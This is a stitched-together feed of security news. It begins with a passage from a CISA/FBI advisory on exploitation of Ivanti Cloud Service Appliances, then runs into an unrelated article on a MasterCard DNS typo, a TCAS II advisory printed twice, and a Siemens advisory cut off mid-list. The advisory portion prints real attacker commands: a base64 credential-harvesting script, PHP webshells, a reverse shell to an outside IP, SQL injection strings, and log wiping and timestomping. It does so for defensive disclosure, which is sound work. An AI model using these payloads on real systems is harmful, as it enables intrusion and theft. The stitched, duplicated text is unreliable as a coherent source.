sudo:  nobody : user NOT in sudoers ; TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/opt/landesk/ldms/LDClient/ldpclient -i ;export PGPASSWORD=`cat /opt/landesk/broker/broker.conf | grep PGSQL_PW | cut -d ‘=’ -f2-`;echo “update user_info set organization=’||/usr/bin/echo aW1wb3J0IG9zLCByZSwgYmFzZTY0LCB0aW1lCm9zLmNoZGlyKCIvdG1wIikKZCA9ICIvYmFja3VwcyIKZGVmIHNldF9tc2cocCwgdD0nJywgbT0nJyk6CiAgICBpZiB0IGFuZCBtOgogICAgICAgIG1zZyA9ICdBQXt9Ont9QkInLmZvcm1hdCh0LCBiYXNlNjQuYjY0ZW5jb2RlKG0uZW5jb2RlKCkpLmRlY29kZSgpKQogICAgZWxzZToKICAgICAgICBtc2cgPSAnJwogICAgb3Muc3lzdGVtKCcnJ2V4cG9ydCBQR1BBU1NXT1JEPXt9O2VjaG8gInVwZGF0ZSB1c2VyX2luZm8gc2V0IG9yZ2FuaXphdGlvbj0ne30nIHdoZXJlIHVzZXJuYW1lPSdhZG1pbicifHBzcWwgLWQgYnJva2VyZGIgLVUgZ3NiYWRtaW4nJycuZm9ybWF0KHAsIG1zZykpCnRyeToKICAgIHIgPSBtYXgoW29zLnBhdGguam9pbihkLCBmKSBmb3IgZiBpbiBvcy5saXN0ZGlyKGQpIGlmIG9zLnBhdGguaXNmaWxlKG9zLnBhdGguam9pbihkLCBmKSldLCBrZXk9b3MucGF0aC5nZXRtdGltZSkKZXhjZXB0OgogICAgciA9IE5vbmUKd2l0aCBvcGVuKCIvb3B0L2xhbmRlc2svYnJva2VyL2Jyb2tlci5jb25mIikgYXMgZjoKICAgIGRicHdkID0gcmUuZmluZGFsbCgiUEdTUUxfUFc9KC4qKSIsIGYucmVhZCgpKVswXQppZiByOgogICAgcCA9IG9zLnBvcGVuKCJleHBvcnQgUEdQQVNTV09SRD17fTtlY2hvIFNFTEVDVCBwYXNzd2QgRlJPTSB1c2VyX2luZm8gV0hFUkUgdXNlcm5hbWU9XFwnYWRtaW5cXCcgfCBwc3FsIC1kIGJyb2tlcmRiIC1VIGdzYmFkbWluIC1oIGxvY2FsaG9zdCIuZm9ybWF0KGRicHdkKSkucmVhZCgpLnNwbGl0KCJcbiIpWy00XS5zdHJpcCgpLnNwbGl0KCc6JykKICAgIG9zLnN5c3RlbSgidGFyIHp4dmYge30iLmZvcm1hdChyKSkKICAgIHdoaWxlIFRydWU6CiAgICAgICAgZm9yIGYgaW4gb3MubGlzdGRpcignLicpOgogICAgICAgICAgICBpZiByZS5tYXRjaCgicGhwXHd7Nn0iLCBmKToKICAgICAgICAgICAgICAgIG9zLmNobW9kKGYsIDBvNzc3KQogICAgICAgICAgICAgICAgbSA9IG9zLnBvcGVuKCIuL3t9IHt9IHt9IHt9IHJvb3QvLmNlcnRzL3t9LmtleSB7fSIuZm9ybWF0KGYsIHBbNF0sIHBbNV0sIHBbNl0sIHBbMV0sIHBbMV0pKS5yZWFkKCkuc3RyaXAoKQogICAgICAgICAgICAgICAgaWYgbToKICAgICAgICAgICAgICAgICAgICBzZXRfbXNnKGRicHdkLCAiUEFTU1dPUkQiLCBtKQogICAgICAgICAgICAgICAgICAgIHRpbWUuc2xlZXAoMjQwKQogICAgICAgICAgICAgICAgICAgIHNldF9tc2coZGJwd2QpCiAgICAgICAgICAgICAgICAgICAgZXhpdCgpCmVsc2U6CiAgICBzZXRfbXNnKGRicHdkLCAnRVJST1InLCAnTk8gQkFDS1VQJykKICAgIAogICAgCg== | /usr/bin/base64 -d | python||’ where username=’admin'”|psql -d brokerdb -U gsbadmin;

Updates the “organization” field of the “admin” account in the PGSQL database with python script decoded from base64. 
The python script decompresses the latest backup of the PGSQL database and extracts the password for the gsbadmin account to access the database.

nobody : user NOT in sudoers ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=/sbin/setenforce 0
Temporarily disables SELinux.

sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo REDACTED_BASE64_PASSWORD | base64 >/opt/landesk/broker/webroot/gsb/site.cnf
Exfiltrates credentials and places them in a site.cnf webfile.

sudo: admin : TTY=unknown ; PWD=/tmp ; USER=root ; COMMAND=/bin/sh -c echo PD9waHAgZXZhbCgkX1BPU1RbImNiNzg2OGM0NjA zNTQ4NTdiNzE5MjA0ZTI3NjZlZGJlIl0pOw== | base64 -d >/opt/landesk/broker/webroot/gsb/view.php
Creates a webshell at view.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/subin/tripwire –update ;/usr/bin/echo ZWNobyAiPD9waHAgc3lzdGVtKCcvYmluL3N1ZG8gJy4Gq
FwkX1JFUVVFU1RbJ2EnXSk7IiA+IC9vcHQvbGFuZGVzay9icm
9rZXIvd2Vicm9vdC9nc2IvaGVscC5waHA= | /usr/bin/base64 -d | /bin/bash;

Creates a webshell at help.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setPhpTimeZone($TIMEZONE)/// setPhpTimeZone()/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Comments out the function setPhpTimeZone in DateTimeTab.php that logs the full exploit command.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/setSystemTimeZone( $TIMEZONE )/// setSystemTimeZone( $TIMEZONE )/g’ /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Comments out the vulnerable function setSystemTimeZone in DateTimeTab.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/GSB main page/GSB main pageneval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/g’ /opt/landesk/broker/webroot/client/index.php
Adds a webshell into index.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;sed -i ‘s/$canvas_height = 600;/$canvas_height = 600;nteval($_POST[“in39112cnnpkyc1os01q34gp6r60akgi”]);/’ /opt/landesk/broker/webroot/gsb/style.php
Adds a webshell into style.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/client/index.php
Timestomping attempt to change the access and modification of time of index.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/style.php
Timestomping attempt to change the access and modification time of style.php

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;touch -r /opt/landesk/broker/webroot/client/about.php /opt/landesk/broker/webroot/gsb/DateTimeTab.php
Timestomping attempt to change the access and modification time of DateTimeTab.php.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/help.php
Timestomping attempt to change the access and modification time of help.php

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /var/log/messages
Removes evidence.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/gsb/site.cnf
Removes site.cnf file (exfiltrated credentials).

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm /opt/landesk/broker/webroot/client/client.php
Removes one of the original webshells.

sudo: gsbadmin : TTY=unknown ; PWD=/opt/landesk/broker/webroot/gsb ; USER=root ; COMMAND=/bin/sh -c cd /opt/landesk/broker/webroot/gsb/;rm
/opt/landesk/broker/webroot/gsb/view.php

Removes one of the original webshells. 

Note: The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways.

Summary

The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): CVE-2024-8963, an administrative bypass vulnerability; CVE-2024-9379, a SQL injection vulnerability; and CVE-2024-8190 and CVE-2024-9380, remote code execution vulnerabilities.

According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.

All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[1]

Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA. Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

Technical Details

Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and CVE-2024-8963.[2][3] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[1]

• CVE-2024-8963 [CWE-22: Path Traversal] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [CWE-78: OS Command Injection], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [T1219].[2][3]
• CVE-2024-9379 [CWE-89: SQL Injection] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[1]
• CVE-2024-9380 [CWE-77: Command Injection] allows a remote authenticated attacker with admin privileges to obtain RCE.[1]

According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[4] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its Known Exploited Vulnerabilities (KEV) Catalog.

According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.

Exploit Chain 1

The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a nobody user [T1564.002], the threat actors first sent a GET request to datetime.php to acquire session and cross-site request forgery (CSRF) tokens using GET /client/index.php%3F.php/gsb/datetime[.]php [T1071.001]. They followed this in quick succession with a POST request to the same endpoint, using the TIMEZONE input field to manipulate the setSystemTimeZone function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [T1552.001]. Note: The actors used multiple script variations. See Appendix A for examples of encoded and decoded scripts.

In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [TA0010]. In other cases, the threat actors leveraged an executable matching the regular expression phpw{6} located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.

After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a GET request to /gsb/reports[.]php. They immediately followed this with a POST request using the TW_ID input field to execute code to implant webshells for persistence [T1505.003].

In one confirmed compromise, the threat actors tried to create webshells using two different paths:

• echo "<?php system(@
$_REQUEST['a']);">/opt/ivanti/csa/broker/webroot/client/help.php
• echo "<?php system('/bin/sudo '. @
$_REQUEST['a']);" > /opt/landesk/broker/webroot/gsb/help.php

In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel: bash -i >&/dev/tcp/107.173.89[.]16/8000 0>&1.

In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used sudo commands to disable the vulnerability in DateTimeTab.php, modify and remove webshells, and remove evidence of exploitation [T1548.003]. See Appendix B for the list of sudo commands used.

Lateral Movement

In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [T1068]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [T1595.002].

Exploit Chain 2

In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using GET /client/index.php%3f.php/gsb/broker.php for initial access.

After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed GET and POST requests in quick succession to /client/index.php%3F.php/gsb/broker.php. In the POST body, threat actors entered the following string in the lockout attempts input box: LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>/.k''', NOW(), 10). The first portion of the command (LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [T1190], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the user_info table.

After inserting valid bash code as a user in the user_info table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran echo -n TnNhV1Z1ZEM5b1pXeHdMbk>>./k as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [T1059]. However, there were no observations that the threat actors were successful.

Detection of Activity

According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.

Victim Organization 1

The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.

Victim Organization 2

This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.

Victim Organization 3

This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.

Indicators of Compromise

See Table 1 through Table 3 for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.

Disclaimer: Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.

 Read More

​The payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals. 

The payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals.

From June 30, 2020 until January 14, 2025, one of the core Internet servers that MasterCard uses to direct traffic for portions of the mastercard.com network was misnamed. MasterCard.com relies on five shared Domain Name System (DNS) servers at the Internet infrastructure provider Akamai [DNS acts as a kind of Internet phone book, by translating website names to numeric Internet addresses that are easier for computers to manage].

All of the Akamai DNS server names that MasterCard uses are supposed to end in “akam.net” but one of them was misconfigured to rely on the domain “akam.ne.”

This tiny but potentially critical typo was discovered recently by Philippe Caturegli, founder of the security consultancy Seralys. Caturegli said he guessed that nobody had yet registered the domain akam.ne, which is under the purview of the top-level domain authority for the West Africa nation of Niger.

Caturegli said it took $300 and nearly three months of waiting to secure the domain with the registry in Niger. After enabling a DNS server on akam.ne, he noticed hundreds of thousands of DNS requests hitting his server each day from locations around the globe. Apparently, MasterCard wasn’t the only organization that had fat-fingered a DNS entry to include “akam.ne,” but they were by far the largest.

Had he enabled an email server on his new domain akam.ne, Caturegli likely would have received wayward emails directed toward mastercard.com or other affected domains. If he’d abused his access, he probably could have obtained website encryption certificates (SSL/TLS certs) that were authorized to accept and relay web traffic for affected websites. He may even have been able to passively receive Microsoft Windows authentication credentials from employee computers at affected companies.

But the researcher said he didn’t attempt to do any of that. Instead, he alerted MasterCard that the domain was theirs if they wanted it, copying this author on his notifications. A few hours later, MasterCard acknowledged the mistake, but said there was never any real threat to the security of its operations.

“We have looked into the matter and there was not a risk to our systems,” a MasterCard spokesperson wrote. “This typo has now been corrected.”

Meanwhile, Caturegli received a request submitted through Bugcrowd, a program that offers financial rewards and recognition to security researchers who find flaws and work privately with the affected vendor to fix them. The message suggested his public disclosure of the MasterCard DNS error via a post on LinkedIn (after he’d secured the akam.ne domain) was not aligned with ethical security practices, and passed on a request from MasterCard to have the post removed.

Caturegli said while he does have an account on Bugcrowd, he has never submitted anything through the Bugcrowd program, and that he reported this issue directly to MasterCard.

“I did not disclose this issue through Bugcrowd,” Caturegli wrote in reply. “Before making any public disclosure, I ensured that the affected domain was registered to prevent exploitation, mitigating any risk to MasterCard or its customers. This action, which we took at our own expense, demonstrates our commitment to ethical security practices and responsible disclosure.”

Most organizations have at least two authoritative domain name servers, but some handle so many DNS requests that they need to spread the load over additional DNS server domains. In MasterCard’s case, that number is five, so it stands to reason that if an attacker managed to seize control over just one of those domains they would only be able to see about one-fifth of the overall DNS requests coming in.

But Caturegli said the reality is that many Internet users are relying at least to some degree on public traffic forwarders or DNS resolvers like Cloudflare and Google.

“So all we need is for one of these resolvers to query our name server and cache the result,” Caturegli said. By setting their DNS server records with a long TTL or “Time To Live” — a setting that can adjust the lifespan of data packets on a network — an attacker’s poisoned instructions for the target domain can be propagated by large cloud providers.

“With a long TTL, we may reroute a LOT more than just 1/5 of the traffic,” he said.

The researcher said he’d hoped that the credit card giant might thank him, or at least offer to cover the cost of buying the domain.

“We obviously disagree with this assessment,” Caturegli wrote in a follow-up post on LinkedIn regarding MasterCard’s public statement. “But we’ll let you judge— here are some of the DNS lookups we recorded before reporting the issue.”

As the screenshot above shows, the misconfigured DNS server Caturegli found involved the MasterCard subdomain az.mastercard.com. It is not clear exactly how this subdomain is used by MasterCard, however their naming conventions suggest the domains correspond to production servers at Microsoft’s Azure cloud service. Caturegli said the domains all resolve to Internet addresses at Microsoft.

“Don’t be like Mastercard,” Caturegli concluded in his LinkedIn post. “Don’t dismiss risk, and don’t let your marketing team handle security disclosures.”

One final note: The domain akam.ne has been registered previously — in December 2016 by someone using the email address um-i-delo@yandex.ru. The Russian search giant Yandex reports this user account belongs to an “Ivan I.” from Moscow. Passive DNS records from DomainTools.com show that between 2016 and 2018 the domain was connected to an Internet server in Germany, and that the domain was left to expire in 2018.

This is interesting given a comment on Caturegli’s LinkedIn post from an ex-Cloudflare employee who linked to a report he co-authored on a similar typo domain apparently registered in 2017 for organizations that may have mistyped their AWS DNS server as “awsdns-06.ne” instead of “awsdns-06.net.” DomainTools reports that this typo domain also was registered to a Yandex user (playlotto@yandex.ru), and was hosted at the same German ISP — Team Internet (AS61969).

 

​Read More

 ​View CSAF
1. EXECUTIVE SUMMARY

CVSS v4 7.1
ATTENTION: Exploitable from adjacent network
Standard: Traffic Alert and Collision Avoidance System (TCAS) II
Equipment: Collision Avoidance Systems
Vulnerabilities: Reliance on Untrusted Inputs in a Security Decision, External Control of System or Configuration Setting

2. RISK EVALUATION
Successful exploitation of these vulnerabilities could allow an attacker to manipulate safety systems and cause a denial-of-service condition.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following revisions of TCAS II are affected:

TCAS II: Versions 7.1 and prior

3.2 Vulnerability Overview
3.2.1 Reliance on Untrusted Inputs in a Security Decision CWE-807
By utilizing software-defined radios and a custom low-latency processing pipeline, RF signals with spoofed location data can be transmitted to aircraft targets. This can lead to the appearance of fake aircraft on displays and potentially trigger undesired Resolution Advisories (RAs).
CWE-2024-9310 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.1 has been calculated; the CVSS vector string is (AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).
A CVSS v4 score has also been calculated for CWE-2024-9310. A base score of 6.0 has been calculated; the CVSS vector string is (AV:A/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N).
3.2.2 External Control of System or Configuration Setting CWE-15
For TCAS II systems using transponders compliant with MOPS earlier than RTCA DO-181F, an attacker can impersonate a ground station and issue a Comm-A Identity Request. This action can set the Sensitivity Level Control (SLC) to the lowest setting and disable the Resolution Advisory (RA), leading to a denial-of-service condition.
CVE-2024-11166 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.2 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H).
A CVSS v4 score has also been calculated for CVE-2024-11166. A base score of 7.1 has been calculated; the CVSS vector string is (AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND

CRITICAL INFRASTRUCTURE SECTORS: Transportation Systems
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER
Giacomo Longo and Enrico Russo of Genova University reported these vulnerabilities to CISA.Martin Strohmeier and Vincent Lenders of armasuisse reported these vulnerabilities to CISA.Alessio Merlo of Centre for High Defense Studies reported these vulnerabilities to CISA.
4. MITIGATIONS
After consulting with the Federal Aviation Administration (FAA) and the researchers regarding these vulnerabilities, it has been concluded that CVE-2024-11166 can be fully mitigated by upgrading to ACAS X or by upgrading the associated transponder to comply with RTCA DO-181F.
Currently, there is no mitigation available for CWE-2024-9310.
These vulnerabilities in the TCAS II standard are exploitable in a lab environment. However, they require very specific conditions to be met and are unlikely to be exploited outside of a lab setting.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely. These vulnerabilities have a high attack complexity.
5. UPDATE HISTORY

January 21, 2024: Initial Publication 

View CSAF

1. EXECUTIVE SUMMARY

• CVSS v4 7.1
• ATTENTION: Exploitable from adjacent network
• Standard: Traffic Alert and Collision Avoidance System (TCAS) II
• Equipment: Collision Avoidance Systems
• Vulnerabilities: Reliance on Untrusted Inputs in a Security Decision, External Control of System or Configuration Setting

2. RISK EVALUATION

Successful exploitation of these vulnerabilities could allow an attacker to manipulate safety systems and cause a denial-of-service condition.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following revisions of TCAS II are affected:

• TCAS II: Versions 7.1 and prior

3.2 Vulnerability Overview

3.2.1 Reliance on Untrusted Inputs in a Security Decision CWE-807

By utilizing software-defined radios and a custom low-latency processing pipeline, RF signals with spoofed location data can be transmitted to aircraft targets. This can lead to the appearance of fake aircraft on displays and potentially trigger undesired Resolution Advisories (RAs).

CWE-2024-9310 has been assigned to this vulnerability. A CVSS v3.1 base score of 6.1 has been calculated; the CVSS vector string is (AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N).

A CVSS v4 score has also been calculated for CWE-2024-9310. A base score of 6.0 has been calculated; the CVSS vector string is (AV:A/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N).

3.2.2 External Control of System or Configuration Setting CWE-15

For TCAS II systems using transponders compliant with MOPS earlier than RTCA DO-181F, an attacker can impersonate a ground station and issue a Comm-A Identity Request. This action can set the Sensitivity Level Control (SLC) to the lowest setting and disable the Resolution Advisory (RA), leading to a denial-of-service condition.

CVE-2024-11166 has been assigned to this vulnerability. A CVSS v3.1 base score of 8.2 has been calculated; the CVSS vector string is (AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H).

A CVSS v4 score has also been calculated for CVE-2024-11166. A base score of 7.1 has been calculated; the CVSS vector string is (AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N).

3.3 BACKGROUND

• CRITICAL INFRASTRUCTURE SECTORS: Transportation Systems
• COUNTRIES/AREAS DEPLOYED: Worldwide
• COMPANY HEADQUARTERS LOCATION: United States

3.4 RESEARCHER

Giacomo Longo and Enrico Russo of Genova University reported these vulnerabilities to CISA.
Martin Strohmeier and Vincent Lenders of armasuisse reported these vulnerabilities to CISA.
Alessio Merlo of Centre for High Defense Studies reported these vulnerabilities to CISA.

4. MITIGATIONS

After consulting with the Federal Aviation Administration (FAA) and the researchers regarding these vulnerabilities, it has been concluded that CVE-2024-11166 can be fully mitigated by upgrading to ACAS X or by upgrading the associated transponder to comply with RTCA DO-181F.

Currently, there is no mitigation available for CWE-2024-9310.

These vulnerabilities in the TCAS II standard are exploitable in a lab environment. However, they require very specific conditions to be met and are unlikely to be exploited outside of a lab setting.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. These vulnerabilities are not exploitable remotely. These vulnerabilities have a high attack complexity.

5. UPDATE HISTORY

• January 21, 2024: Initial Publication

 Read More

 ​CISA released three Industrial Control Systems (ICS) advisories on January 21, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

ICSA-25-021-01 Traffic Alert and Collision Avoidance System (TCAS) II
ICSA-25-021-02 Siemens SIMATIC S7-1200 CPUs
ICSA-25-021-03 ZF Roll Stability Support Plus (RSSPlus)

CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations. 

CISA released three Industrial Control Systems (ICS) advisories on January 21, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

• ICSA-25-021-01 Traffic Alert and Collision Avoidance System (TCAS) II
• ICSA-25-021-02 Siemens SIMATIC S7-1200 CPUs
• ICSA-25-021-03 ZF Roll Stability Support Plus (RSSPlus)

CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

 Read More

 ​As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens’ ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
View CSAF
1. EXECUTIVE SUMMARY

CVSS v4 7.2
ATTENTION: Exploitable remotely/low attack complexity
Vendor: Siemens
Equipment: SIMATIC S7-1200 CPUs
Vulnerability: Cross-Site Request Forgery

2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an unauthenticated attacker to change the CPU mode by tricking a legitimate and authenticated user with sufficient permissions on the target CPU to click on a malicious link.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
Siemens reports that the following products are affected:

SIMATIC S7-1200 CPU 1211C AC/DC/Rly (6ES7211-1BE40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214C DC/DC/DC (6ES7214-1AG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214C DC/DC/Rly (6ES7214-1HG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214FC DC/DC/DC (6ES7214-1AF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1214FC DC/DC/Rly (6ES7214-1HF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215C AC/DC/Rly (6ES7215-1BG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215C DC/DC/DC (6ES7215-1AG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215C DC/DC/Rly (6ES7215-1HG40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215FC DC/DC/DC (6ES7215-1AF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1215FC DC/DC/Rly (6ES7215-1HF40-0XB0): Versions prior to V4.7
SIMATIC S7-1200 CPU 1217C DC/DC/DC (6ES7217-1AG40-0XB0): Versions prior to V4.7
